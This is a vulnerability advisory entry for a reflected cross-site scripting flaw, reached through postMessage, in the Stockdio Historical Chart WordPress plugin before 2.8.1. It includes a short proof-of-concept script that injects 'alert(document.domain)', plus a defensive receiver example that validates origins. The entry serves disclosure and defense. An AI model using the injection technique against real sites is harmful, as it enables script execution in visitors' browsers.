WordPress Plugin Vulnerabilities
Stockdio Historical Chart < 2.8.1 - Reflected Cross-Site Scripting (XSS)
Description
The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
Proof of Concept
Use the following code on another website:

<script>
  var popup = window.open('https://VULNERABLE.PAGE/');
  var msg = {};
  msg.method = "alert(document.domain)";
  function post() { popup.postMessage(msg, '*'); }
  setInterval(post, 1000);
</script>
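A receiver-side mitigation for this class of issue, as an added example that is not the plugin's code or its actual fix. It assumes, from the PoC's `msg.method` string, a `message` handler that acts on the `method` field, and shows one that checks `event.origin` and dispatches through a fixed table instead. The origin, method names and helper names are hypothetical.

```javascript
// Added example (not the plugin's code): a postMessage receiver that never
// evaluates message content. All names and values below are hypothetical.

// Origins permitted to send commands (constructed sample value).
const TRUSTED_ORIGINS = new Set(['https://widgets.example.com']);

// Fixed dispatch table: a message can only select one of these functions by
// name; the text of the message is never executed.
function createMethods(state) {
  return {
    setHeight(args) {
      const h = Number(args && args.height);
      if (!Number.isInteger(h) || h < 0 || h > 5000) return false;
      state.height = h;
      return true;
    },
    refresh() { state.refreshes += 1; return true; },
  };
}

function makeMessageHandler(trustedOrigins, methods) {
  return function onMessage(event) {
    // 1. Reject any sender whose origin is not explicitly trusted. A sender
    //    using targetOrigin '*' still carries its own origin in event.origin.
    if (!trustedOrigins.has(event.origin)) return 'rejected-origin';
    const data = event.data;
    // 2. Require a plain object carrying a string method name.
    if (data === null || typeof data !== 'object' ||
        typeof data.method !== 'string') return 'rejected-shape';
    // 3. Own-property lookup only, so inherited names such as "constructor"
    //    cannot resolve to a callable.
    if (!Object.prototype.hasOwnProperty.call(methods, data.method)) {
      return 'rejected-method';
    }
    return methods[data.method](data.args) ? 'ok' : 'rejected-args';
  };
}

// Browser wiring; skipped when run outside a browser.
if (typeof window !== 'undefined') {
  const pageState = { height: 0, refreshes: 0 };
  window.addEventListener('message',
    makeMessageHandler(TRUSTED_ORIGINS, createMethods(pageState)));
}
```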
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
jondow
Verified
No
WPVDB ID
Timeline
Publicly Published
2021-01-20 (about 3 years ago)
Added
2021-01-20 (about 3 years ago)
Last Updated
2021-01-21 (about 3 years ago)